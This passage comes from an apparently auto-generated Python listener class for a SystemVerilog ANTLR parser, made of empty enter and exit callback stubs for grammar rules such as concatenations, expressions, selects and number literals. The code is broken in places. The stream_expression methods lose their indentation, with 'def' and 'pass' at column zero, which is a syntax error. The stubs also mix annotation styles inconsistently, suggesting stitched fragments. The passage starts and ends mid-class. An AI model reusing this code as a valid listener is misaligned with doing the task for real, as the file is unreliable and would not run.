    def exitConstant_concatenation(self, ctx:SystemVerilogParser.Constant_concatenationContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#constant_multiple_concatenation.
    def enterConstant_multiple_concatenation(self, ctx:SystemVerilogParser.Constant_multiple_concatenationContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#constant_multiple_concatenation.
    def exitConstant_multiple_concatenation(self, ctx:SystemVerilogParser.Constant_multiple_concatenationContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#module_path_concatenation.
    def enterModule_path_concatenation(self, ctx:SystemVerilogParser.Module_path_concatenationContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#module_path_concatenation.
    def exitModule_path_concatenation(self, ctx:SystemVerilogParser.Module_path_concatenationContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#module_path_multiple_concatenation.
    def enterModule_path_multiple_concatenation(self, ctx:SystemVerilogParser.Module_path_multiple_concatenationContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#module_path_multiple_concatenation.
    def exitModule_path_multiple_concatenation(self, ctx:SystemVerilogParser.Module_path_multiple_concatenationContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#multiple_concatenation.
    def enterMultiple_concatenation(self, ctx:SystemVerilogParser.Multiple_concatenationContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#multiple_concatenation.
    def exitMultiple_concatenation(self, ctx:SystemVerilogParser.Multiple_concatenationContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#streaming_concatenation.
    def enterStreaming_concatenation(self, ctx:SystemVerilogParser.Streaming_concatenationContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#streaming_concatenation.
    def exitStreaming_concatenation(self, ctx:SystemVerilogParser.Streaming_concatenationContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#stream_operator.
    def enterStream_operator(self, ctx:SystemVerilogParser.Stream_operatorContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#stream_operator.
    def exitStream_operator(self, ctx:SystemVerilogParser.Stream_operatorContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#slice_size.
    def enterSlice_size(self, ctx:SystemVerilogParser.Slice_sizeContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#slice_size.
    def exitSlice_size(self, ctx:SystemVerilogParser.Slice_sizeContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#stream_concatenation.
    def enterStream_concatenation(self, ctx:SystemVerilogParser.Stream_concatenationContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#stream_concatenation.
    def exitStream_concatenation(self, ctx:SystemVerilogParser.Stream_concatenationContext):
        pass
# Enter a parse tree produced by SystemVerilogParser#stream_expression.
def enterStream_expression(self, ctx:SystemVerilogParser.Stream_expressionContext):
pass
# Exit a parse tree produced by SystemVerilogParser#stream_expression.
def exitStream_expression(self, ctx:SystemVerilogParser.Stream_expressionContext):
pass
    # Enter a parse tree produced by SystemVerilogParser#array_range_expression.
    def enterArray_range_expression(self, ctx:SystemVerilogParser.Array_range_expressionContext) -> None:
        pass

    # Exit a parse tree produced by SystemVerilogParser#array_range_expression.
    def exitArray_range_expression(self, ctx:SystemVerilogParser.Array_range_expressionContext) -> None:
        pass

    # Enter a parse tree produced by SystemVerilogParser#empty_unpacked_array_concatenation.
    def enterEmpty_unpacked_array_concatenation(self, ctx:SystemVerilogParser.Empty_unpacked_array_concatenationContext) -> None:
        pass

    # Exit a parse tree produced by SystemVerilogParser#empty_unpacked_array_concatenation.
    def exitEmpty_unpacked_array_concatenation(self, ctx:SystemVerilogParser.Empty_unpacked_array_concatenationContext) -> None:
        pass

    # Enter a parse tree produced by SystemVerilogParser#tf_call.
    def enterTf_call(self, ctx:SystemVerilogParser.Tf_callContext) -> None:
        pass

    # Exit a parse tree produced by SystemVerilogParser#tf_call.
    def exitTf_call(self, ctx:SystemVerilogParser.Tf_callContext) -> None:
        pass

    # Enter a parse tree produced by SystemVerilogParser#system_tf_call.
    def enterSystem_tf_call(self, ctx:SystemVerilogParser.System_tf_callContext) -> None:
        pass

    # Exit a parse tree produced by SystemVerilogParser#system_tf_call.
    def exitSystem_tf_call(self, ctx:SystemVerilogParser.System_tf_callContext) -> None:
        pass

    # Enter a parse tree produced by SystemVerilogParser#subroutine_call.
    def enterSubroutine_call(self, ctx:SystemVerilogParser.Subroutine_callContext) -> None:
        pass

    # Exit a parse tree produced by SystemVerilogParser#subroutine_call.
    def exitSubroutine_call(self, ctx:SystemVerilogParser.Subroutine_callContext) -> None:
        pass

    # Enter a parse tree produced by SystemVerilogParser#function_subroutine_call.
    def enterFunction_subroutine_call(self, ctx:SystemVerilogParser.Function_subroutine_callContext) -> None:
        pass

    # Exit a parse tree produced by SystemVerilogParser#function_subroutine_call.
    def exitFunction_subroutine_call(self, ctx:SystemVerilogParser.Function_subroutine_callContext) -> None:
        pass

    # Enter a parse tree produced by SystemVerilogParser#list_of_arguments.
    def enterList_of_arguments(self, ctx:SystemVerilogParser.List_of_argumentsContext) -> None:
        pass

    # Exit a parse tree produced by SystemVerilogParser#list_of_arguments.
    def exitList_of_arguments(self, ctx:SystemVerilogParser.List_of_argumentsContext) -> None:
        pass

    # Enter a parse tree produced by SystemVerilogParser#list_of_arguments_with_strings.
    def enterList_of_arguments_with_strings(self, ctx:SystemVerilogParser.List_of_arguments_with_stringsContext) -> None:
        pass

    # Exit a parse tree produced by SystemVerilogParser#list_of_arguments_with_strings.
    def exitList_of_arguments_with_strings(self, ctx:SystemVerilogParser.List_of_arguments_with_stringsContext) -> None:
        pass

    # Enter a parse tree produced by SystemVerilogParser#method_call_body.
    def enterMethod_call_body(self, ctx:SystemVerilogParser.Method_call_bodyContext) -> None:
        pass

    # Exit a parse tree produced by SystemVerilogParser#method_call_body.
    def exitMethod_call_body(self, ctx:SystemVerilogParser.Method_call_bodyContext) -> None:
        pass

    # Enter a parse tree produced by SystemVerilogParser#built_in_method_call.
    def enterBuilt_in_method_call(self, ctx:SystemVerilogParser.Built_in_method_callContext) -> None:
        pass

    # Exit a parse tree produced by SystemVerilogParser#built_in_method_call.
    def exitBuilt_in_method_call(self, ctx:SystemVerilogParser.Built_in_method_callContext) -> None:
        pass

    # Enter a parse tree produced by SystemVerilogParser#array_manipulation_call.
    def enterArray_manipulation_call(self, ctx:SystemVerilogParser.Array_manipulation_callContext) -> None:
        pass

    # Exit a parse tree produced by SystemVerilogParser#array_manipulation_call.
    def exitArray_manipulation_call(self, ctx:SystemVerilogParser.Array_manipulation_callContext) -> None:
        pass

    # Enter a parse tree produced by SystemVerilogParser#array_method_call.
    def enterArray_method_call(self, ctx:SystemVerilogParser.Array_method_callContext) -> None:
        pass

    # Exit a parse tree produced by SystemVerilogParser#array_method_call.
    def exitArray_method_call(self, ctx:SystemVerilogParser.Array_method_callContext) -> None:
        pass

    # Enter a parse tree produced by SystemVerilogParser#iterator_argument.
    def enterIterator_argument(self, ctx:SystemVerilogParser.Iterator_argumentContext) -> None:
        pass

    # Exit a parse tree produced by SystemVerilogParser#iterator_argument.
    def exitIterator_argument(self, ctx:SystemVerilogParser.Iterator_argumentContext) -> None:
        pass

    # Enter a parse tree produced by SystemVerilogParser#randomize_call.
    def enterRandomize_call(self, ctx:SystemVerilogParser.Randomize_callContext) -> None:
        pass

    # Exit a parse tree produced by SystemVerilogParser#randomize_call.
    def exitRandomize_call(self, ctx:SystemVerilogParser.Randomize_callContext) -> None:
        pass

    # Enter a parse tree produced by SystemVerilogParser#array_method_name.
    def enterArray_method_name(self, ctx:SystemVerilogParser.Array_method_nameContext) -> None:
        pass

    # Exit a parse tree produced by SystemVerilogParser#array_method_name.
    def exitArray_method_name(self, ctx:SystemVerilogParser.Array_method_nameContext) -> None:
        pass

    # Enter a parse tree produced by SystemVerilogParser#inc_or_dec_expression.
    def enterInc_or_dec_expression(self, ctx:SystemVerilogParser.Inc_or_dec_expressionContext) -> None:
        pass

    # Exit a parse tree produced by SystemVerilogParser#inc_or_dec_expression.
    def exitInc_or_dec_expression(self, ctx:SystemVerilogParser.Inc_or_dec_expressionContext) -> None:
        pass
    # Enter a parse tree produced by SystemVerilogParser#constant_expression.
    def enterConstant_expression(self, ctx:SystemVerilogParser.Constant_expressionContext) -> None:
        pass

    # Exit a parse tree produced by SystemVerilogParser#constant_expression.
    def exitConstant_expression(self, ctx:SystemVerilogParser.Constant_expressionContext) -> None:
        pass

    # Enter a parse tree produced by SystemVerilogParser#constant_mintypmax_expression.
    def enterConstant_mintypmax_expression(self, ctx:SystemVerilogParser.Constant_mintypmax_expressionContext) -> None:
        pass

    # Exit a parse tree produced by SystemVerilogParser#constant_mintypmax_expression.
    def exitConstant_mintypmax_expression(self, ctx:SystemVerilogParser.Constant_mintypmax_expressionContext) -> None:
        pass

    # Enter a parse tree produced by SystemVerilogParser#constant_param_expression.
    def enterConstant_param_expression(self, ctx:SystemVerilogParser.Constant_param_expressionContext) -> None:
        pass

    # Exit a parse tree produced by SystemVerilogParser#constant_param_expression.
    def exitConstant_param_expression(self, ctx:SystemVerilogParser.Constant_param_expressionContext) -> None:
        pass

    # Enter a parse tree produced by SystemVerilogParser#param_expression.
    def enterParam_expression(self, ctx:SystemVerilogParser.Param_expressionContext) -> None:
        pass

    # Exit a parse tree produced by SystemVerilogParser#param_expression.
    def exitParam_expression(self, ctx:SystemVerilogParser.Param_expressionContext) -> None:
        pass

    # Enter a parse tree produced by SystemVerilogParser#constant_range_expression.
    def enterConstant_range_expression(self, ctx:SystemVerilogParser.Constant_range_expressionContext) -> None:
        pass

    # Exit a parse tree produced by SystemVerilogParser#constant_range_expression.
    def exitConstant_range_expression(self, ctx:SystemVerilogParser.Constant_range_expressionContext) -> None:
        pass

    # Enter a parse tree produced by SystemVerilogParser#constant_part_select_range.
    def enterConstant_part_select_range(self, ctx:SystemVerilogParser.Constant_part_select_rangeContext) -> None:
        pass

    # Exit a parse tree produced by SystemVerilogParser#constant_part_select_range.
    def exitConstant_part_select_range(self, ctx:SystemVerilogParser.Constant_part_select_rangeContext) -> None:
        pass

    # Enter a parse tree produced by SystemVerilogParser#constant_range.
    def enterConstant_range(self, ctx:SystemVerilogParser.Constant_rangeContext) -> None:
        pass

    # Exit a parse tree produced by SystemVerilogParser#constant_range.
    def exitConstant_range(self, ctx:SystemVerilogParser.Constant_rangeContext) -> None:
        pass

    # Enter a parse tree produced by SystemVerilogParser#constant_indexed_range.
    def enterConstant_indexed_range(self, ctx:SystemVerilogParser.Constant_indexed_rangeContext) -> None:
        pass

    # Exit a parse tree produced by SystemVerilogParser#constant_indexed_range.
    def exitConstant_indexed_range(self, ctx:SystemVerilogParser.Constant_indexed_rangeContext) -> None:
        pass

    # Enter a parse tree produced by SystemVerilogParser#string_or_expression.
    def enterString_or_expression(self, ctx:SystemVerilogParser.String_or_expressionContext) -> None:
        pass

    # Exit a parse tree produced by SystemVerilogParser#string_or_expression.
    def exitString_or_expression(self, ctx:SystemVerilogParser.String_or_expressionContext) -> None:
        pass

    # Enter a parse tree produced by SystemVerilogParser#expression.
    def enterExpression(self, ctx:SystemVerilogParser.ExpressionContext) -> None:
        pass

    # Exit a parse tree produced by SystemVerilogParser#expression.
    def exitExpression(self, ctx:SystemVerilogParser.ExpressionContext) -> None:
        pass

    # Enter a parse tree produced by SystemVerilogParser#tagged_union_expression.
    def enterTagged_union_expression(self, ctx:SystemVerilogParser.Tagged_union_expressionContext) -> None:
        pass

    # Exit a parse tree produced by SystemVerilogParser#tagged_union_expression.
    def exitTagged_union_expression(self, ctx:SystemVerilogParser.Tagged_union_expressionContext) -> None:
        pass

    # Enter a parse tree produced by SystemVerilogParser#value_range.
    def enterValue_range(self, ctx:SystemVerilogParser.Value_rangeContext) -> None:
        pass

    # Exit a parse tree produced by SystemVerilogParser#value_range.
    def exitValue_range(self, ctx:SystemVerilogParser.Value_rangeContext) -> None:
        pass

    # Enter a parse tree produced by SystemVerilogParser#mintypmax_expression.
    def enterMintypmax_expression(self, ctx:SystemVerilogParser.Mintypmax_expressionContext) -> None:
        pass

    # Exit a parse tree produced by SystemVerilogParser#mintypmax_expression.
    def exitMintypmax_expression(self, ctx:SystemVerilogParser.Mintypmax_expressionContext) -> None:
        pass

    # Enter a parse tree produced by SystemVerilogParser#module_path_conditional_expression.
    def enterModule_path_conditional_expression(self, ctx:SystemVerilogParser.Module_path_conditional_expressionContext) -> None:
        pass

    # Exit a parse tree produced by SystemVerilogParser#module_path_conditional_expression.
    def exitModule_path_conditional_expression(self, ctx:SystemVerilogParser.Module_path_conditional_expressionContext) -> None:
        pass

    # Enter a parse tree produced by SystemVerilogParser#module_path_expression.
    def enterModule_path_expression(self, ctx:SystemVerilogParser.Module_path_expressionContext) -> None:
        pass

    # Exit a parse tree produced by SystemVerilogParser#module_path_expression.
    def exitModule_path_expression(self, ctx:SystemVerilogParser.Module_path_expressionContext) -> None:
        pass

    # Enter a parse tree produced by SystemVerilogParser#module_path_mintypmax_expression.
    def enterModule_path_mintypmax_expression(self, ctx:SystemVerilogParser.Module_path_mintypmax_expressionContext) -> None:
        pass

    # Exit a parse tree produced by SystemVerilogParser#module_path_mintypmax_expression.
    def exitModule_path_mintypmax_expression(self, ctx:SystemVerilogParser.Module_path_mintypmax_expressionContext) -> None:
        pass

    # Enter a parse tree produced by SystemVerilogParser#part_select_range.
    def enterPart_select_range(self, ctx:SystemVerilogParser.Part_select_rangeContext) -> None:
        pass

    # Exit a parse tree produced by SystemVerilogParser#part_select_range.
    def exitPart_select_range(self, ctx:SystemVerilogParser.Part_select_rangeContext) -> None:
        pass

    # Enter a parse tree produced by SystemVerilogParser#indexed_range.
    def enterIndexed_range(self, ctx:SystemVerilogParser.Indexed_rangeContext) -> None:
        pass

    # Exit a parse tree produced by SystemVerilogParser#indexed_range.
    def exitIndexed_range(self, ctx:SystemVerilogParser.Indexed_rangeContext) -> None:
        pass

    # Enter a parse tree produced by SystemVerilogParser#genvar_expression.
    def enterGenvar_expression(self, ctx:SystemVerilogParser.Genvar_expressionContext) -> None:
        pass

    # Exit a parse tree produced by SystemVerilogParser#genvar_expression.
    def exitGenvar_expression(self, ctx:SystemVerilogParser.Genvar_expressionContext) -> None:
        pass
    # Enter a parse tree produced by SystemVerilogParser#constant_primary.
    def enterConstant_primary(self, ctx:SystemVerilogParser.Constant_primaryContext) -> None:
        pass

    # Exit a parse tree produced by SystemVerilogParser#constant_primary.
    def exitConstant_primary(self, ctx:SystemVerilogParser.Constant_primaryContext) -> None:
        pass

    # Enter a parse tree produced by SystemVerilogParser#primary.
    def enterPrimary(self, ctx:SystemVerilogParser.PrimaryContext) -> None:
        pass

    # Exit a parse tree produced by SystemVerilogParser#primary.
    def exitPrimary(self, ctx:SystemVerilogParser.PrimaryContext) -> None:
        pass

    # Enter a parse tree produced by SystemVerilogParser#module_path_primary.
    def enterModule_path_primary(self, ctx:SystemVerilogParser.Module_path_primaryContext) -> None:
        pass

    # Exit a parse tree produced by SystemVerilogParser#module_path_primary.
    def exitModule_path_primary(self, ctx:SystemVerilogParser.Module_path_primaryContext) -> None:
        pass

    # Enter a parse tree produced by SystemVerilogParser#class_qualifier.
    def enterClass_qualifier(self, ctx:SystemVerilogParser.Class_qualifierContext) -> None:
        pass

    # Exit a parse tree produced by SystemVerilogParser#class_qualifier.
    def exitClass_qualifier(self, ctx:SystemVerilogParser.Class_qualifierContext) -> None:
        pass

    # Enter a parse tree produced by SystemVerilogParser#range_expression.
    def enterRange_expression(self, ctx:SystemVerilogParser.Range_expressionContext) -> None:
        pass

    # Exit a parse tree produced by SystemVerilogParser#range_expression.
    def exitRange_expression(self, ctx:SystemVerilogParser.Range_expressionContext) -> None:
        pass

    # Enter a parse tree produced by SystemVerilogParser#primary_literal.
    def enterPrimary_literal(self, ctx:SystemVerilogParser.Primary_literalContext) -> None:
        pass

    # Exit a parse tree produced by SystemVerilogParser#primary_literal.
    def exitPrimary_literal(self, ctx:SystemVerilogParser.Primary_literalContext) -> None:
        pass

    # Enter a parse tree produced by SystemVerilogParser#time_literal.
    def enterTime_literal(self, ctx:SystemVerilogParser.Time_literalContext) -> None:
        pass

    # Exit a parse tree produced by SystemVerilogParser#time_literal.
    def exitTime_literal(self, ctx:SystemVerilogParser.Time_literalContext) -> None:
        pass

    # Enter a parse tree produced by SystemVerilogParser#time_unit.
    def enterTime_unit(self, ctx:SystemVerilogParser.Time_unitContext) -> None:
        pass

    # Exit a parse tree produced by SystemVerilogParser#time_unit.
    def exitTime_unit(self, ctx:SystemVerilogParser.Time_unitContext) -> None:
        pass

    # Enter a parse tree produced by SystemVerilogParser#implicit_class_handle.
    def enterImplicit_class_handle(self, ctx:SystemVerilogParser.Implicit_class_handleContext) -> None:
        pass

    # Exit a parse tree produced by SystemVerilogParser#implicit_class_handle.
    def exitImplicit_class_handle(self, ctx:SystemVerilogParser.Implicit_class_handleContext) -> None:
        pass

    # Enter a parse tree produced by SystemVerilogParser#bit_select.
    def enterBit_select(self, ctx:SystemVerilogParser.Bit_selectContext) -> None:
        pass

    # Exit a parse tree produced by SystemVerilogParser#bit_select.
    def exitBit_select(self, ctx:SystemVerilogParser.Bit_selectContext) -> None:
        pass

    # Enter a parse tree produced by SystemVerilogParser#select.
    def enterSelect(self, ctx:SystemVerilogParser.SelectContext) -> None:
        pass

    # Exit a parse tree produced by SystemVerilogParser#select.
    def exitSelect(self, ctx:SystemVerilogParser.SelectContext) -> None:
        pass

    # Enter a parse tree produced by SystemVerilogParser#nonrange_select.
    def enterNonrange_select(self, ctx:SystemVerilogParser.Nonrange_selectContext) -> None:
        pass

    # Exit a parse tree produced by SystemVerilogParser#nonrange_select.
    def exitNonrange_select(self, ctx:SystemVerilogParser.Nonrange_selectContext) -> None:
        pass

    # Enter a parse tree produced by SystemVerilogParser#constant_bit_select.
    def enterConstant_bit_select(self, ctx:SystemVerilogParser.Constant_bit_selectContext) -> None:
        pass

    # Exit a parse tree produced by SystemVerilogParser#constant_bit_select.
    def exitConstant_bit_select(self, ctx:SystemVerilogParser.Constant_bit_selectContext) -> None:
        pass

    # Enter a parse tree produced by SystemVerilogParser#constant_select.
    def enterConstant_select(self, ctx:SystemVerilogParser.Constant_selectContext) -> None:
        pass

    # Exit a parse tree produced by SystemVerilogParser#constant_select.
    def exitConstant_select(self, ctx:SystemVerilogParser.Constant_selectContext) -> None:
        pass

    # Enter a parse tree produced by SystemVerilogParser#constant_let_expression.
    def enterConstant_let_expression(self, ctx:SystemVerilogParser.Constant_let_expressionContext) -> None:
        pass

    # Exit a parse tree produced by SystemVerilogParser#constant_let_expression.
    def exitConstant_let_expression(self, ctx:SystemVerilogParser.Constant_let_expressionContext) -> None:
        pass

    # Enter a parse tree produced by SystemVerilogParser#net_lvalue.
    def enterNet_lvalue(self, ctx:SystemVerilogParser.Net_lvalueContext) -> None:
        pass

    # Exit a parse tree produced by SystemVerilogParser#net_lvalue.
    def exitNet_lvalue(self, ctx:SystemVerilogParser.Net_lvalueContext) -> None:
        pass

    # Enter a parse tree produced by SystemVerilogParser#variable_lvalue.
    def enterVariable_lvalue(self, ctx:SystemVerilogParser.Variable_lvalueContext) -> None:
        pass

    # Exit a parse tree produced by SystemVerilogParser#variable_lvalue.
    def exitVariable_lvalue(self, ctx:SystemVerilogParser.Variable_lvalueContext) -> None:
        pass

    # Enter a parse tree produced by SystemVerilogParser#nonrange_variable_lvalue.
    def enterNonrange_variable_lvalue(self, ctx:SystemVerilogParser.Nonrange_variable_lvalueContext) -> None:
        pass

    # Exit a parse tree produced by SystemVerilogParser#nonrange_variable_lvalue.
    def exitNonrange_variable_lvalue(self, ctx:SystemVerilogParser.Nonrange_variable_lvalueContext) -> None:
        pass
    # Enter a parse tree produced by SystemVerilogParser#unary_operator.
    def enterUnary_operator(self, ctx:SystemVerilogParser.Unary_operatorContext) -> None:
        pass

    # Exit a parse tree produced by SystemVerilogParser#unary_operator.
    def exitUnary_operator(self, ctx:SystemVerilogParser.Unary_operatorContext) -> None:
        pass

    # Enter a parse tree produced by SystemVerilogParser#binary_operator.
    def enterBinary_operator(self, ctx:SystemVerilogParser.Binary_operatorContext) -> None:
        pass

    # Exit a parse tree produced by SystemVerilogParser#binary_operator.
    def exitBinary_operator(self, ctx:SystemVerilogParser.Binary_operatorContext) -> None:
        pass

    # Enter a parse tree produced by SystemVerilogParser#inc_or_dec_operator.
    def enterInc_or_dec_operator(self, ctx:SystemVerilogParser.Inc_or_dec_operatorContext) -> None:
        pass

    # Exit a parse tree produced by SystemVerilogParser#inc_or_dec_operator.
    def exitInc_or_dec_operator(self, ctx:SystemVerilogParser.Inc_or_dec_operatorContext) -> None:
        pass

    # Enter a parse tree produced by SystemVerilogParser#unary_module_path_operator.
    def enterUnary_module_path_operator(self, ctx:SystemVerilogParser.Unary_module_path_operatorContext) -> None:
        pass

    # Exit a parse tree produced by SystemVerilogParser#unary_module_path_operator.
    def exitUnary_module_path_operator(self, ctx:SystemVerilogParser.Unary_module_path_operatorContext) -> None:
        pass

    # Enter a parse tree produced by SystemVerilogParser#binary_module_path_operator.
    def enterBinary_module_path_operator(self, ctx:SystemVerilogParser.Binary_module_path_operatorContext) -> None:
        pass

    # Exit a parse tree produced by SystemVerilogParser#binary_module_path_operator.
    def exitBinary_module_path_operator(self, ctx:SystemVerilogParser.Binary_module_path_operatorContext) -> None:
        pass

    # Enter a parse tree produced by SystemVerilogParser#number.
    def enterNumber(self, ctx:SystemVerilogParser.NumberContext) -> None:
        pass

    # Exit a parse tree produced by SystemVerilogParser#number.
    def exitNumber(self, ctx:SystemVerilogParser.NumberContext) -> None:
        pass

    # Enter a parse tree produced by SystemVerilogParser#integral_number.
    def enterIntegral_number(self, ctx:SystemVerilogParser.Integral_numberContext) -> None:
        pass

    # Exit a parse tree produced by SystemVerilogParser#integral_number.
    def exitIntegral_number(self, ctx:SystemVerilogParser.Integral_numberContext) -> None:
        pass

    # Enter a parse tree produced by SystemVerilogParser#decimal_number.
    def enterDecimal_number(self, ctx:SystemVerilogParser.Decimal_numberContext) -> None:
        pass

    # Exit a parse tree produced by SystemVerilogParser#decimal_number.
    def exitDecimal_number(self, ctx:SystemVerilogParser.Decimal_numberContext) -> None:
        pass

    # Enter a parse tree produced by SystemVerilogParser#binary_number.
    def enterBinary_number(self, ctx:SystemVerilogParser.Binary_numberContext) -> None:
        pass

    # Exit a parse tree produced by SystemVerilogParser#binary_number.
    def exitBinary_number(self, ctx:SystemVerilogParser.Binary_numberContext) -> None:
        pass

    # Enter a parse tree produced by SystemVerilogParser#octal_number.
    def enterOctal_number(self, ctx:SystemVerilogParser.Octal_numberContext) -> None:
        pass

    # Exit a parse tree produced by SystemVerilogParser#octal_number.
    def exitOctal_number(self, ctx:SystemVerilogParser.Octal_numberContext) -> None:
        pass

    # Enter a parse tree produced by SystemVerilogParser#hex_number.
    def enterHex_number(self, ctx:SystemVerilogParser.Hex_numberContext) -> None:
        pass

    # Exit a parse tree produced by SystemVerilogParser#hex_number.
    def exitHex_number(self, ctx:SystemVerilogParser.Hex_numberContext) -> None:
        pass

    # Enter a parse tree produced by SystemVerilogParser#sign.
    def enterSign(self, ctx:SystemVerilogParser.SignContext) -> None:
        pass

    # Exit a parse tree produced by SystemVerilogParser#sign.
    def exitSign(self, ctx:SystemVerilogParser.SignContext) -> None:
        pass

    # Enter a parse tree produced by SystemVerilogParser#size.
    def enterSize(self, ctx:SystemVerilogParser.SizeContext) -> None:
        pass

    # Exit a parse tree produced by SystemVerilogParser#size.
    def exitSize(self, ctx:SystemVerilogParser.SizeContext) -> None:
        pass

    # Enter a parse tree produced by SystemVerilogParser#non_zero_unsigned_number.
    def enterNon_zero_unsigned_number(self, ctx:SystemVerilogParser.Non_zero_unsigned_numberContext) -> None:
        pass

    # Exit a parse tree produced by SystemVerilogParser#non_zero_unsigned_number.
    def exitNon_zero_unsigned_number(self, ctx:SystemVerilogParser.Non_zero_unsigned_numberContext) -> None:
        pass

    # Enter a parse tree produced by SystemVerilogParser#real_number.
    def enterReal_number(self, ctx:SystemVerilogParser.Real_numberContext) -> None:
        pass

    # Exit a parse tree produced by SystemVerilogParser#real_number.
    def exitReal_number(self, ctx:SystemVerilogParser.Real_numberContext) -> None:
        pass

    # Enter a parse tree produced by SystemVerilogParser#fixed_point_number.
    def enterFixed_point_number(self, ctx:SystemVerilogParser.Fixed_point_numberContext) -> None:
        pass

    # Exit a parse tree produced by SystemVerilogParser#fixed_point_number.
    def exitFixed_point_number(self, ctx:SystemVerilogParser.Fixed_point_numberContext) -> None:
        pass

    # Enter a parse tree produced by SystemVerilogParser#exp.
    def enterExp(self, ctx:SystemVerilogParser.ExpContext) -> None:
        pass

    # Exit a parse tree produced by SystemVerilogParser#exp.
    def exitExp(self, ctx:SystemVerilogParser.ExpContext) -> None:
        pass

    # Enter a parse tree produced by SystemVerilogParser#unsigned_number.
    def enterUnsigned_number(self, ctx:SystemVerilogParser.Unsigned_numberContext) -> None:
        pass

    # Exit a parse tree produced by SystemVerilogParser#unsigned_number.
    def exitUnsigned_number(self, ctx:SystemVerilogParser.Unsigned_numberContext) -> None:
        pass

    # Enter a parse tree produced by SystemVerilogParser#binary_value.
    def enterBinary_value(self, ctx:SystemVerilogParser.Binary_valueContext) -> None:
        pass

    # Exit a parse tree produced by SystemVerilogParser#binary_value.
    def exitBinary_value(self, ctx:SystemVerilogParser.Binary_valueContext) -> None:
        pass

    # Enter a parse tree produced by SystemVerilogParser#octal_value.
    def enterOctal_value(self, ctx:SystemVerilogParser.Octal_valueContext) -> None:
        pass

    # Exit a parse tree produced by SystemVerilogParser#octal_value.
    def exitOctal_value(self, ctx:SystemVerilogParser.Octal_valueContext) -> None:
        pass

    # Enter a parse tree produced by SystemVerilogParser#hex_value.
    def enterHex_value(self, ctx:SystemVerilogParser.Hex_valueContext) -> None:
        pass

    # Exit a parse tree produced by SystemVerilogParser#hex_value.
    def exitHex_value(self, ctx:SystemVerilogParser.Hex_valueContext) -> None:
        pass
    # Enter a parse tree produced by SystemVerilogParser#decimal_base.
    def enterDecimal_base(self, ctx:SystemVerilogParser.Decimal_baseContext) -> None:
        pass

    # Exit a parse tree produced by SystemVerilogParser#decimal_base.
    def exitDecimal_base(self, ctx:SystemVerilogParser.Decimal_baseContext) -> None:
        pass

    # Enter a parse tree produced by SystemVerilogParser#binary_base.
    def enterBinary_base(self, ctx:SystemVerilogParser.Binary_baseContext) -> None:
        pass

    # Exit a parse tree produced by SystemVerilogParser#binary_base.
    def exitBinary_base(self, ctx:SystemVerilogParser.Binary_baseContext) -> None:
        pass

    # Enter a parse tree produced by SystemVerilogParser#octal_base.
    def enterOctal_base(self, ctx:SystemVerilogParser.Octal_baseContext) -> None:
        pass

    # Exit a parse tree produced by SystemVerilogParser#octal_base.
    def exitOctal_base(self, ctx:SystemVerilogParser.Octal_baseContext) -> None:
        pass

    # Enter a parse tree produced by SystemVerilogParser#hex_base.
    def enterHex_base(self, ctx:SystemVerilogParser.Hex_baseContext) -> None:
        pass

    # Exit a parse tree produced by SystemVerilogParser#hex_base.
    def exitHex_base(self, ctx:SystemVerilogParser.Hex_baseContext) -> None:
        pass

    # Enter a parse tree produced by SystemVerilogParser#non_zero_decimal_digit.
    def enterNon_zero_decimal_digit(self, ctx:SystemVerilogParser.Non_zero_decimal_digitContext) -> None:
        pass

    # Exit a parse tree produced by SystemVerilogParser#non_zero_decimal_digit.
    def exitNon_zero_decimal_digit(self, ctx:SystemVerilogParser.Non_zero_decimal_digitContext) -> None:
        pass

    # Enter a parse tree produced by SystemVerilogParser#decimal_digit.
    def enterDecimal_digit(self, ctx:SystemVerilogParser.Decimal_digitContext) -> None:
        pass

    # Exit a parse tree produced by SystemVerilogParser#decimal_digit.
    def exitDecimal_digit(self, ctx:SystemVerilogParser.Decimal_digitContext) -> None:
        pass

    # Enter a parse tree produced by SystemVerilogParser#binary_digit.
    def enterBinary_digit(self, ctx:SystemVerilogParser.Binary_digitContext) -> None:
        pass

    # Exit a parse tree produced by SystemVerilogParser#binary_digit.
    def exitBinary_digit(self, ctx:SystemVerilogParser.Binary_digitContext) -> None:
        pass

    # Enter a parse tree produced by SystemVerilogParser#octal_digit.
    def enterOctal_digit(self, ctx:SystemVerilogParser.Octal_digitContext) -> None:
        pass

    # Exit a parse tree produced by SystemVerilogParser#octal_digit.
    def exitOctal_digit(self, ctx:SystemVerilogParser.Octal_digitContext) -> None:
        pass

    # Enter a parse tree produced by SystemVerilogParser#hex_digit.
    def enterHex_digit(self, ctx:SystemVerilogParser.Hex_digitContext) -> None:
        pass

    # Exit a parse tree produced by SystemVerilogParser#hex_digit.
    def exitHex_digit(self, ctx:SystemVerilogParser.Hex_digitContext) -> None:
        pass

    # Enter a parse tree produced by SystemVerilogParser#x_digit.
    def enterX_digit(self, ctx:SystemVerilogParser.X_digitContext) -> None:
        pass

    # Exit a parse tree produced by SystemVerilogParser#x_digit.
    def exitX_digit(self, ctx:SystemVerilogParser.X_digitContext) -> None:
        pass

    # Enter a parse tree produced by SystemVerilogParser#z_digit.
    def enterZ_digit(self, ctx:SystemVerilogParser.Z_digitContext) -> None:
        pass

    # Exit a parse tree produced by SystemVerilogParser#z_digit.
    def exitZ_digit(self, ctx:SystemVerilogParser.Z_digitContext) -> None:
        pass

    # Enter a parse tree produced by SystemVerilogParser#unbased_unsized_literal.
    def enterUnbased_unsized_literal(self, ctx:SystemVerilogParser.Unbased_unsized_literalContext) -> None:
        pass

    # Exit a parse tree produced by SystemVerilogParser#unbased_unsized_literal.
    def exitUnbased_unsized_literal(self, ctx:SystemVerilogParser.Unbased_unsized_literalContext) -> None:
        pass
    # Enter a parse tree produced by SystemVerilogParser#string_literal.
    def enterString_literal(self, ctx:SystemVerilogParser.String_literalContext) -> None:
